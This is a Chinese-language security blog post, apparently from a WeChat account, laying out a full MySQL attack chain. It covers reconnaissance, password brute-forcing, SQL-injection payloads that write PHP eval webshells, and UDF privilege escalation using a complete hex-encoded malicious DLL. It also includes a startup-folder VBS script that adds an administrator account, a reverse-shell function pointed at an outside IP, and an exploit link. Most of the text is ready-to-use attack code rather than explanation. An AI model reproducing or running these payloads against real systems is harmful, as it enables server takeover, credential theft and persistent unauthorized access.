【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

  • A+
所属分类:安全文章

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

目录


0x01 Mysql信息收集

    1.使用Nmap进行mysql的信息收集

    2.通过msf探测mysql信息

    3.使用sqlmap进行sql注入收集mysql版本信息


0x02 获取mysql密码

    1.使用msf模块爆破

    2.nmap脚本进行爆破

    3.sqlmap的sql-shell查询哈希值

    4.从网站泄露的源代码中查找配置文件获取用户名密码


0x03 通过Mysql向服务器写shell

    1.利用联合注入写入shell

    2.当sql注入为盲注或者报错注入时,可以使用分隔符写入shell

    3.当secure_file_priv为NULL写入shell


0x04 Mysql提权

    1.UDF手动提权

        1.1msf下使用UDF提权

    2.mysql启动项提权

        2.2 msf启动项提权

    3.反弹端口提权

    4.CVE-2016-6663提权


0x01 Mysql信息收集


1.1 使用Nmap进行mysql的信息收集

nmap -sC -sV 192.168.0.107 -p3306

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

或者使用nmap的nse脚本对MySQL进行扫描

└─# ls -lah /usr/share/nmap/scripts/*mysql*-rw-r--r-- 1 root root 6.5K Oct 12  2020 /usr/share/nmap/scripts/mysql-audit.nse-rw-r--r-- 1 root root 3.0K Oct 12  2020 /usr/share/nmap/scripts/mysql-brute.nse-rw-r--r-- 1 root root 2.9K Oct 12  2020 /usr/share/nmap/scripts/mysql-databases.nse-rw-r--r-- 1 root root 3.2K Oct 12  2020 /usr/share/nmap/scripts/mysql-dump-hashes.nse-rw-r--r-- 1 root root 2.0K Oct 12  2020 /usr/share/nmap/scripts/mysql-empty-password.nse-rw-r--r-- 1 root root 3.4K Oct 12  2020 /usr/share/nmap/scripts/mysql-enum.nse-rw-r--r-- 1 root root 3.4K Oct 12  2020 /usr/share/nmap/scripts/mysql-info.nse-rw-r--r-- 1 root root 3.7K Oct 12  2020 /usr/share/nmap/scripts/mysql-query.nse-rw-r--r-- 1 root root 2.8K Oct 12  2020 /usr/share/nmap/scripts/mysql-users.nse-rw-r--r-- 1 root root 3.2K Oct 12  2020 /usr/share/nmap/scripts/mysql-variables.nse-rw-r--r-- 1 root root 6.9K Oct 12  2020 /usr/share/nmap/scripts/mysql-vuln-cve2012-2122.nse 
nmap --script=mysql-enum 192.168.0.107 -p3306    #枚举mysql用户名,结果不一定准确

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


1.2 通过msf探测mysql信息

use auxiliary/scanner/mysql/mysql_authbypass_hashdumpuse auxiliary/scanner/mysql/mysql_loginuse auxiliary/scanner/mysql/mysql_writable_dirsuse auxiliary/scanner/mysql/mysql_file_enum            use auxiliary/scanner/mysql/mysql_schemadump           use auxiliary/scanner/mysql/mysql_hashdump             use auxiliary/scanner/mysql/mysql_version

下图以探测mysql版本为例

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


1.3 使用sqlmap进行sql注入收集mysql版本信息

sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" --batch  --threads 10 -v 3

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


0x02 获取mysql密码


2.1 使用msf模块爆破

use auxiliary/scanner/mysql/mysql_loginset username rootset pass_file /usr/share/wordlists/rockyou.txtset rhosts 192.168.0.107run

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


2.2 nmap脚本进行爆破

nmap -p 3306 --script=mysql-brute.nse userdb=/usr/share/wordlists/user.txt passdb=/usr/share/wordlists/rockyou.txt 192.168.0.107

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


2.3 sqlmap的sql-shell查询哈希值

sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" --batch  --threads 100 --sql-shell -v 3 select host, user, password from mysql.user;    #MySQL的用户名密码哈希值保存在mysql库的user表中 # MySQL <= 5.6 版本mysql> select host, user, password from mysql.user;# MySQL >= 5.7 版本mysql > select host,user,authentication_string from mysql.user;

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

在cmd5网址查询

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


2.4 从网站泄露的源代码中查找配置文件获取用户名密码

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)



0x03 通过Mysql向服务器写shell


条件:

  • 存在sql注入漏洞

  • 需要知道网站的web物理路径

  • 当前用户有文件写入权限

  • secure_file_priv 选项支持数据导出

secure_file_priv 参数用于限制  LOAD DATA, SELECTOUTFILE, LOAD_FILE()传到哪个指定目录。secure_file_priv 为 NULL 时,  表示限制mysqld不允许导入或导出。secure_file_priv 为 /tmp 时,  表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能执行。secure_file_priv 没有值时,  表示不限制mysqld在任意目录的导入导出。
在 MySQL 5.5 之前 secure_file_priv 默认是空,这个情况下可以向任意绝对路径写文件
在 MySQL 5.5之后 secure_file_priv 默认是 NULL,这个情况下不可以写文件

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


(1)需要修改mysql配置文件,my.ini最后一行添加secure_file_priv='C:/',重启mysql,再次查询

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

(2)查看网站的绝对路径

通过phpinfo或者sql报错注入

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


3.1 利用联合注入写入shell

http://192.168.0.107/sqli/Less-1/?id=-1' union select 1,2,'<?php @eval($_post["pass"]);?>' into outfile "C:\Phpsdudy\PHPTutorial\WWW\1.php"--+ 或者把php一句话十六进制编码mysql支持hex编码http://192.168.0.107/sqli/Less-1/?id=-1' union select 1,2,0x3C3F70687020406576616C28245F706F73745B2270617373225D293B3F3E into outfile "C:\Phpsdudy\PHPTutorial\WWW\2.php"--+

3.2 当sql注入为盲注或者报错注入时,可以使用分隔符写入shell

http://192.168.0.107/sqli/Less-1/?id=-1' into outfile "C:\Phpsdudy\PHPTutorial\WWW\3.php" lines terminated by 0x3C3F70687020406576616C28245F706F73745B2270617373225D293B3F3E --+

利用分隔符写入shell的四种形式

?id=1 into outfile '物理路径' lines terminated by  (一句话hex编码)#?id=1 into outfile '物理路径' fields terminated by (一句话hex编码)#?id=1 into outfile '物理路径' columns terminated by (一句话hex编码)#?id=1 into outfile '物理路径' lines starting by (一句话hex编码)#

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


3.3 当secure_file_priv为NULL写入shell



Mysql查询日志用来保存所有跟查询相关的日志,我们可以通过指定mysql日志的存放路径来往目标主机上写入webshell,但是也要对生成的日志有可读可写的权限,这种日志类型默认是关闭状态的。

启用general_ log_file写日志方法获取shell

条件:

  • Web 文件夹宽松权限可以写入

  • Windows 系统下

  • 高权限运行 MySQL 或者 Apache


  • 【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

(1) 查看genera文件配置情况show global variables like '%genera%';    
#general_log默认关闭,开启它可以记录用户输入的每条命令,#尝试自定义日志文件,并向日志文件里面写入内容的话,#那么就可以成功getshell (2)关闭general_logset global general_log =off; (3)通过general_log选项来获取webshellset global general_log= 'on';set global general_log_file='C:/Phpsdudy/PHPTutorial/WWW/4.php'; #更改日志位置select '<?php assert($_POST["123"]);?>'; #日志中写入payload

0x04 MySql提权


4.1 UDF手动提权

自定义函数,是数据库功能的一种扩展。用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像调用本机函数 version() 等方便。


提权原理:UDF的使用需要调用其动态链接库文件(.dll或.so),使用UDF提权原理大概就是通过引入恶意的udf.dll,引入自定义函数(如sys_eval()函数),执行系统命令。


利用条件:


  • 当前mysql数据库的账户有对mysql的insert和deleter权限,以创建和抛弃函数

  • 当前用户拥有可以将udf,dll写入对应目录的权限

  • mysql<5.1,udf.dll应该存放在c:windows或c:windowssystem32

  • mysql>5.1,udf文件在mysql安装目录下的lib/plugin文件夹下,该文件夹默认不存在,需要手动创建


UDF提权步骤

1.查看secure_file_priv的值需要值为空才能导入文件

show variables like '%secure_file_priv%';

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

2.查看系统结构及plugin插件目录

select 233 into dumpfile   'C:\Phpsdudy\PHPTutorial\MySQL\lib\plugin::$index_allocation';      #plugin目录不存在创建该目录show variables like '%compile%';    # 查看主机版本及架构show variables like '%plugin%';    # 查看plugin目录

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

3.在plugin目录下写入恶意的动态链接库文件

在sqlmap和msf目录下均有该插件

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

sqlmap中的动态链接库经过编码处理,需要使用sqlmap自带的解码工具cloak.py解码才能使用

┌──(root??kali)-[/usr/share/sqlmap/extra/cloak]└─# python3 cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ -o abc.dll    

(1)通过sqlmap写入动态链接库,需要POST注入才能写入

sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1" --threads 100 --file-write="/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll" --file-dest="C:\Phpsdudy\PHPTutorial\MySQL\lib\plugin\a.dll"


(2)执行sql语句写入动态链接库

phpstudy的mysql是32位的,因此要写入32位的dll文件。

select hex(load_file('/tmp/lib_mysqludf_sys_32.so')) into outfile "/tmp/udf_32.hex";    #本机下进行十六进制编码#或者直接复制国光师傅转码完成的动态链接库文件内容    https://www.sqlsec.com/tools/udf.html #写入udf.dll文件SELECT 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a24000000000000004d477bd0092615830926158309261583005e86830b261583005e808308261583005e968307261583005e91830b2615832ee06e830a2615830926148325261583005e9c8308261583005e878308261583005e8483082615835269636809261583000000000000000000000000000000000000000000000000504500004c0103004afe9f5a0000000000000000e00002210b010900001000000010000000600000607c0000007000000080000000000010001000000002000005000000000000000500000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007c83000008020000b4820000c800000000800000b402000000000000000000000000000000000000848500001000000000000000000000000000000000000000000000000000000000000000000000002c7e00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000e0555058310000000000100000007000000010000000040000000000000000000000000000400000e02e7273726300000000100000008000000006000000140000000000000000000000000000400000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332e393100555058210d090208b92bcf11b11ceea24f550000560c000000220000260000a8ffffffff8b4c240833c03901741656578b7c24146a0c59be000010dcf3a566a55fb0015e5dfb77fbc38b44240c1a6a071611108bf8183218ff63db6f1ca45fc7011e1200210883380175128b40040df6776f0700750a1004c6000132c0c3530abf1df68d3c3053a454082d08ff30ff15fff6ee776c885985c075085614c601011bc8568d71018a11fd6fdffe4184d275f98b54142bce890a32558bec8b4d0c833902b7d860bf5374148b7d10915c5453eb4cbf9dbddf8b417d740f1b707c1bebe5836004dbb1ffb7001a0c8b48048b008d4401025072a0594c08dfc8d7b5891678113006a44ceb6c57beb7b2b85f5e5da30421740833dbb63ff6a8591353568b742410d878534602db85db5bb6460851c78d5c4257e8240b75eeeebfe01400c604070008ff70041e0553b1db1b921a22c418535720030054090f09b7086a995b0f98599954cf2d343713b8f4540b1edeb60d818403552251519d35dffed6fedf576800f762d66a018945fc068bf08b4560dd7ff70cc606004533ff595939387471683cc071c6fedfda9c12260c3bc7745b506a04ff75fc149073e1edd7a9fd48533afc8d48911040b963dbff2bc18bd88d043b505630f8268c5330d8ad8dbd5f03fe570e940de57df8463fe6364c2066ba5b1810a4803e0059169eb0ff741a8bc6c64437ff00594d1489c906987bebd86f183e5f205ec9c3eed7b235dcbaf37d574708c45030087bdbdacdc9c26a4078c710548d4601b9e07e614251724f0856ff31cf6bafdd9db694c66aff8dc32082f63a58b0b6030d092c23005f7cc36e57036c6a081d1290ac0aa88365fc2f6c2f2c2d4592d0eb071b408f65e8c70bbfd66e42feff000d1fedc25e3bffdb17b60d08209a02f3c3e90806f58bff56688000002d8c6d675880985608845aa3bde0febb062358045485f675054daa83260076fbb7db4508c36f08ed09acc704240607ff0b4c113637598d71ffcf9c0bbf77dfc9750e39056b107e3cff7310830b01fbeec6bb8b0910548b098f57890a23480f85d47d618cbbad641718068b79040838071b76edeebb1e50eb184aa705b8e61768b0b030d8e803a83c0957c1d6bbaeb5d6a1e7e9e2573ca12f4c6a6ff777c3025efd096a1fee76eb3caa10c80475ed7befc0c7051f281a70e027071bdff79d5cb520bc04b81b6a5635b952eb782b7339b2e3696ff7defd7340393d155c741c68062809ac43db6b85850d9e1034252316ffe666f862f154b201dc0801592cc2b1a1db78049ddfdbf62413d90fd4fc83f80266b16f6cb0d2595bffa0584b77783bb5783106350f8487c71996ee4cd3543bf81810897d82efc796be35fac87251833f8af36a7c398587b4f10774e9ffc8d60f7c89c5db9bb5d955f85615441b474ded5be38ef88a394d1003d00874b48909437aa36d020c1ad3f8eba71c3162cc5a64442e386161fb0a58064c32fc19503f1bdf720443375bc9c20cc710fb02231fb2288b2ef28b5d081cae0fdb9b54e433c95cfc7d2008016c2dc6c23bf15a393a4417e4d61bfe7fafae3bf0740583fe02752e1910d03bc1e7166eb8ed57565fd03b5ee40003937b703b67115a039614168012376c7d270a8227fea0246420575062b30d661327002f527f8df61ad2061153f76a037543b067bb614f34032168742e2c0d2c3cec257feb1b71ec5a09706a7c6faae05051597c64825d900eadf62ffa8a19066b8f91b6c72ae490c396ec1640e134a9ff3b246abb41c1f17926547dbc550c0d381e33bc05bc595d382281ec2832f7869f365f212043211c895e2118891d05f78ec243143c21a2aa210c668c186c5ffbda3806252c0620080605dd2dcdd20425002d7ffc9c8f7ab6b1f6143095562407042831d6fedb7f0807348b85e0fca0aa701ddbb5b395011c1920241318092b18476a565f201cb360c32c9f7b8985d8320a04dc03b557e01b243468dedfd1f7d8d360ce2879d40a2c833d208dbdc3da00f923685b1b300bdfaf67f534c97f23401ec25f6a4849918f144a50152e9df458aaf8a29c10f3eb67611c7e052c37d4598feded8321b9273551e0f5ee3bdc0abf03e4507f4b8417185bdb7e600bce1cdc142cd6e288b154b609e01b14f413160a4bdb313ddcdbffdc84676cc859d94e1e07f7d81bf076bbb7c00359485d1656b8bc18be04a3638b6f2af83bc673080753025073d85f60835a3bfe72f15f5e25206c6053c820cc006f35b4dd452bb84d5a346627040b85bf2b5e6e413c03c1813850e45fefa5ecfffb33d2b90b011c48180f94c28bc25dc33fb702bf35e34831c80fb74114ae057106c1a55b6c33578c081817761bffff2ff1d7487bf972098b580803d93bfb720a4283c0283bd67270ca36b5e86ae55dc38f6afef0cd71f7a970040b056418005083ec080db7c670082f316c33c576f0852f06df64a31a89b90968555db7f081f0b2091c6b04f555972dd12c937d1350195c083b04e1c26f2724c1e81ff715e0018fefb6532b034f230059948be55dc3621ddb49a301ca3dafc0fae99525242631ccff29343232b61058054c50ac2cb41e97af12b60d56096b27d7616b20cfb0fbef2ae4e03160031f73d9665b9a6c038d2be0fafc046ba039f13cb4fc8a0d6c120c7d0dc395c3c1619c965154147fe41f3e783124f020140bdac40e5643b25d53ec1068f885626df4f888c9bf4ee640bb25eea0398466820d85c33149db9f0a359a04eb605675f869639fc1f6448b7598751f1033f0071476e6ca20189d271cb4f6ee6fedf4330c113bf77507be4f59eb0b85f30a7b047ea10ac1e0100bf0ce00f7d6076c840d1e045e5f01c33f5c05646464646064686c1405766474b000003ff4c20e034b0f20185f4e6f20ffffb7ff617267756d656e7473096c6c6f77656420287564663a206c69625f6dccfd6df77973716c0d5f73085f696e666f293918dfb6ff8f2076657273696f6e20302e01341f45787065f6dbdbdd637447657861076c79201a65207374723f5bdb5afb672074791b75726171217258c00e602b7477911fd86f030b3f8672206e616d48dbb1b71f436f756c246e6f74c4636113203058b76d186d2779af72f1483fda4d943f2003121071051bf29d5860214707d0604d0d0b0f81cb074ed961dd9703ab17cc2708a77527ecc00fd81f0a3b034fc0a07b851f03240328c1556583a200c5889251ca22d877bdb119bf44ff000f5565a3aa00a8aa9251645455c95532aaaafff61d455c0410020157616974466f00fc06c07253886c654f626a07c07f6b99145669727475616c417603e0f6370d536574456e76126f6ec000bc6dbf5661726961622b4118437265f76deb6e94546806640d47264375727222cd12f65b502a636573734914266e03e083135469636bde6e6bb1f6b6fd5175657279500366846d616e371667ef1b00fd0144697367374cfdb7eded6962727879436192731a4973446562756767edee6dad266a686546a4556e6840b1b7b7b7643164457846707469af46696c4a6d295b6119b41254de64aeb0176d0dd8114990b9edd61a0a6b409d6d70876547c25a73cd517f77555122b4ed6e591b5c537973186deec3c2eb2e39417373650975697cdb15da434c7d5f687e396d5f2edffedebe5f616d7367087869740b646a753a5f666469ec4217b076260a639a5f64fd6cadb91f5f686f6f6b131459725ff802700148d15fdb9ceb0249730a330a6c21d6f0bd82539c2a64d46e640893050b130f651e6b5b7bc25f2c723456ed6d1c182ff6d69a700a035f706f522947e1ddbe6e106468756c5eb92a6bcb92bd9b1b2ca806e0b6d86e6ec57265250866112e827bdb5673749c637079082439edcd5c6b32c06e4d0fd7ed1f5ac36f7319663a1f5f4370705831c75e3b8474bc6d343f001817ffffffff3d193c1c1b161e55142d16270815270f11115f10130a070d2e17090705160c1e7ffbffff080a0b160918181505061b050c10060717062105110f061421110b08e4fbdfb62b22052a111d0d18532d483806000776fbdbe5080c09330a090b0c051007061612eedffeed0e0b34150b18160d3d0542c205121e14066930ffd8ddff110c0e1d4d0517230d0c3224080b4506f0de041004f03b0a6eff2c01043808041c1c0204003e4c016dff21fd05004afe9f5a8fe00002210b0109080c634f7ad60c1213d616a300200e10c10a01630b02ab3362b7ee6107006003040233351eeed9c0ce34100706c02633d6eddb7620ac22033c144002b0021c5759dd0050520143c8c8ba65b1214200a7b82f06db5d182eb4787407ea0b900c5bfa90cdb742602e72647d610861c90e76c508fb0a00c700a1db66bb77402e26300304301becdb943d001a27c04f73726300eb11c0061b40731c4f78c2c2a365761f01030002ed7760497b27421ba023030000edd8d152127c53030400000000000080ff00000000000000000000807c2408010f85b901000060be007000108dbe00a0ffff5783cdffeb0d9090908a064688074701db75078b1e83eefc11db72edb80100000001db75078b1e83eefc11db11c001db73ef75098b1e83eefc11db73e431c983e803720dc1e0088a064683f0ff747489c501db75078b1e83eefc11db11c901db75078b1e83eefc11db11c975204101db75078b1e83eefc11db11c901db73ef75098b1e83eefc11db73e483c10281fd00f3ffff83d1018d142f83fdfc760f8a02428807474975f7e963ffffff908b0283c204890783c70483e90477f101cfe94cffffff5e89f7b92a0000008a07472ce83c0177f7803f0075f28b078a5f0466c1e808c1c01086c429f880ebe801f0890783c70588d8e2d98dbe005000008b0709c0743c8b5f048d8430b472000001f35083c708ff96f0720000958a074708c074dc89f95748f2ae55ff96f472000009c07407890383c304ebe16131c0c20c0083c7048d5efc31c08a074709c074223cef771101c38b0386c4c1c01086c401f08903ebe2240fc1e010668b0783c702ebe28baef87200008dbe00f0ffffbb0010000050546a045357ffd58d871702000080207f8060287f585054505357ffd558618d4424806a0039c475fa83ec80e9ad98ffff0000004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030001010220010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005c80000056020000e404000000000000584000003c617373656d626c7920786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e763122206d616e696665737456657273696f6e3d22312e30223e0d0a20203c7472757374496e666f20786d6c6e733d2275726e3a736368656d61732d6d6963726f736f66742d636f6d3a61736d2e7633223e0d0a202020203c73656375726974793e0d0a2020202020203c72657175657374656450726976696c656765733e0d0a20202020202020203c726571756573746564457865637574696f6e4c6576656c206c6576656c3d226173496e766f6b6572222075694163636573733d2266616c7365223e3c2f726571756573746564457865637574696f6e4c6576656c3e0d0a2020202020203c2f72657175657374656450726976696c656765733e0d0a202020203c2f73656375726974793e0d0a20203c2f7472757374496e666f3e0d0a20203c646570656e64656e63793e0d0a202020203c646570656e64656e74417373656d626c793e0d0a2020202020203c617373656d626c794964656e7469747920747970653d2277696e333222206e616d653d224d6963726f736f66742e564339302e435254222076657273696f6e3d22392e302e32313032322e38222070726f636573736f724172636869746563747572653d2278383622207075626c69634b6579546f6b656e3d2231666338623362396131653138653362223e3c2f617373656d626c794964656e746974793e0d0a202020203c2f646570656e64656e74417373656d626c793e0d0a20203c2f646570656e64656e63793e0d0a3c2f617373656d626c793e504100000000000000000000000010830000f08200000000000000000000000000001d83000008830000000000000000000000000000000000000000000028830000368300004683000056830000648300000000000072830000000000004b45524e454c33322e444c4c004d5356435239302e646c6c00004c6f61644c69627261727941000047657450726f634164647265737300005669727475616c50726f7465637400005669727475616c416c6c6f6300005669727475616c467265650000006672656500000000000000004afe9f5a0000000058840000010000001200000012000000a4830000ec8300003484000021100000a312000000100000a4120000a3120000a0120000cc110000a31200009811000086110000a31200009811000076100000a3120000431000002e1100001a110000a91000006d84000083840000a0840000bb840000c7840000da840000eb840000f484000004850000128500001b8500002b8500003985000041850000508500005d850000658500007485000000000100020003000400050006000700080009000a000b000c000d000e000f00100011006c69625f6d7973716c7564665f7379732e646c6c006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f62696e6576616c007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f6576616c007379735f6576616c5f6465696e6974007379735f6576616c5f696e6974007379735f65786563007379735f657865635f6465696e6974007379735f657865635f696e6974007379735f676574007379735f6765745f6465696e6974007379735f6765745f696e6974007379735f736574007379735f7365745f6465696e6974007379735f7365745f696e69740000000000700000100000006d3c683e6c3e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 INTO DUMPFILE 'C:\Phpsdudy\PHPTutorial\MySQL\lib\plugin\udf.dll'; create function sys_eval returns string soname 'udf.dll';    #创建自定义函数并调用命令select * from mysql.func;    #查看是否新增了sys_evalselect sys_eval('whoami');    #执行系统命令   drop function sys_eval;    #删除自定义函数

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

(3)远程写入动态链接库文件

select load_file('\\192.168.0.105udf.dll') into dumpfile "C:\Phpsdudy\PHPTutorial\MySQL\lib\plugin\udf2.dll";

1.1msf下使用UDF提权

use exploit/multi/mysql/mysql_udf_payload set password rootrun

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

mysql:create function sys_eval returns string soname 'AuYXClEy.dll';select sys_eval('whoami');

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

2.mysql启动项提权

利用into outfile或者into dumpfile写入自定义脚本到开机自启目录下,当管理员重启服务器时,就会自动允许这些脚本,在Windows下可以写入vbs脚本或者exe执行文件。

Set WshShell=WScript.CreateObject("WScript.Shell")WshShell.Run "net user hacker P@ssw0rd /add", 0WshShell.Run "net localgroup administrators hacker /add", 0

mysql写入vbs自启动脚本

select  0x536574205773685368656C6C3D575363726970742E4372656174654F626A6563742822575363726970742E5368656C6C22290A5773685368656C6C2E52756E20226E65742075736572206861636B6572205040737377307264202F616464222C20300A5773685368656C6C2E52756E20226E6574206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F616464222C20300A  into dumpfile'C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3.vbs';#win2008启动项路径:C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupC:ProgramDataMicrosoftWindowsStart MenuProgramsStartup

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

2.2 msf启动项提权

use exploit/windows/mysql/mysql_start_upset password rootset username rootset rhosts 192.168.0.107 run

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


3.反弹端口提权

和上边相同的方式上传dll文件dll

CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';select backshell("192.168.0.105", 3333);

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)


4.CVE-2016-6663提权

CVE-2016-6662、CVE-2016-6663、CVE-2016-6664提权漏洞,影响了Mysql小于5.5.51或小于5.6.32或小于5.7.14及衍生版本。


6636利用条件:


  • getshell获得www-data权限

  • 获取到一个拥有create,insert,select低权限账户

  • 提权过程需要在交互式的shell环境中运行,需要反弹shell再提权

  • MySQL 版本需要 <=5.5.51 或 5.6.x <=5.6.32 或 5.7.x <=5.7.14 或 8.x < 8.0.1

  • MariaDB 版本需要 <= 5.5.51 或 10.0.x <= 10.0.27 或 10.1.x <= 10.1.17

CVE-2016-6663可以将www-data权限提升为mysql权限,使用6664再将mysql权限提升为root权限。复现未成功,有时间在尝试。

exp:

https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html


参考链接:


https://www.sqlsec.com/2020/11/mysql.html#toc-heading-31

https://www.freebuf.com/articles/network/261917.html

https://xz.aliyun.com/t/1122

https://blog.csdn.net/qq_34640691/article/details/116010014




推 荐 阅 读





往期重点


11种绕过CDN查找真实IP方法

【内网渗透系列】- 获取windows hash的几种方式(文中附工具下载链接)

如侵权请私聊公众号删文【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

长按-识别-关注

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

Hacking黑白红

一个专注Hacking技术的学习平台

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

点分享

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

点收藏

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

点点赞

【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

点在看


本文始发于微信公众号(Hacking黑白红):【信息安全基础系列】1|-mysql漏洞利用与提权(总结的完整)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: